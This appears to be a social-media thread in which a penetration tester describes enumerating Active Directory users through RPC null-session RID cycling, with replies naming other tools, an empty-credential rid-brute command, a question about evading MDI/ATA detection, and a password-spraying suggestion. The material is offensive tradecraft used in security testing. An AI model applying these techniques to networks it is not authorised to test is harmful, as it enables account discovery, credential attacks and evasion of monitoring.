One thing I always look for when starting in a network without AD creds is user enumeration with RPC null sessions. impacket SAMR (samrdump) and LSARPC (lookupsid) tools will give you only a small part of the story. Here's my minimal RID cycling script gist.github.com/naksyn/8204c76… that outplayed everything else, enabling me to find some crackable ASREP-roastable DA accounts hiding with RID > 50000 that were unable to be found using other tools. I am using chunks to avoid DoS and getting NT_STATUS_INSUFFICIENT_RESOURCES, ofc you can tweak it according to your YOLO level. there will be a new RPC connection for every chunk, it's a bit better than cycling and using rpcclient every time and always starting RPC connections from scratch. However, RID cycling with rpcclient will generate a ton of STATUS_NO_SUCH_USER responses that are sus, if someone is looking and knows what to look for ofc
@naksyn @mubix I like to use nullinux for this use case: github.com/m8sec/nullinux
@naksyn how does this work better over `nxc smb -u '' -p '' --rid-brute`?
@naksyn This kind of user enumeration does not trigger MDI or ATA detection ?
@naksyn The better duo: user enum with null session + pwd spraying "Company2023"